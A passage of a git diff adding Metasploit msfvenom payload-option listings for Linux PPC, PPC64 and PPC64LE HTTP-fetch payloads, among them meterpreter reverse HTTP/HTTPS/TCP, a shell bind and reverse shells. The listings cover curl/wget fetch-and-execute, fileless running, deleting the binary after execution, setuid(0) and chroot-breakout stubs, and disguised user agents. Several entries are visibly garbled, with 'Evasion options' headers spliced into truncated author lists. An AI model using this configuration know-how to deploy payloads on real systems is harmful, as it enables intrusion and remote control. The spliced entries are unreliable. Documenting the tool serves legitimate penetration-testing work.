no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_https.txt new file mode 100644 index 0000000..c83c1fc --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_https.txt 
@@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/ppc/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/ppc/meterpreter_reverse_https: +========================= + +t_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME lthBvzzMnq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..74522e1 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/ppc/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME GaFcxwZUmDD no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc64-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-ppc64-shell_bind_tcp.txt new file mode 100644 index 0000000..0e11d4f --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-http-ppc64-shell_bind_tcp.txt 
@@ -0,0 +1,78 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/http/ppc64/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME vRPiJbIWuxG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from an HTTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + 
WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc64-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-http-ppc64-shell_find_port.txt new file mode 100644 index 0000000..f0791c6 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc64-shell_find_port.txt 
@@ -0,0 +1,77 @@ + + Name: HTTP Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/http/ppc64/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 23590 no The local client port +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME GpPkBKxBZbnd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from an HTTP server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + 
WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-ppc64-shell_reverse_tcp.txt new file mode 100644 index 0000000..7a20fed --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc64-shell_reverse_tcp.txt 
@@ -0,0 +1,85 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/ppc64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME AtxdiUGw no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from an HTTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even 
with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_http.txt new file mode 100644 index 0000000..bb8e08b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_http.txt 
@@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/ppc64le/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/http/ppc64le/meterpreter_reverse_http: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ssRObbfaiI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload 
UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_https.txt new file mode 100644 index 0000000..598147b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc64le-meterpreter_reverse_https.txt 
@@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/ppc64le/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Br +Evasion options for payload/cmd/linux/http/ppc64le/meterpreter_reverse_https: +========================= + +apid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME zpXXDAbAdXJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + 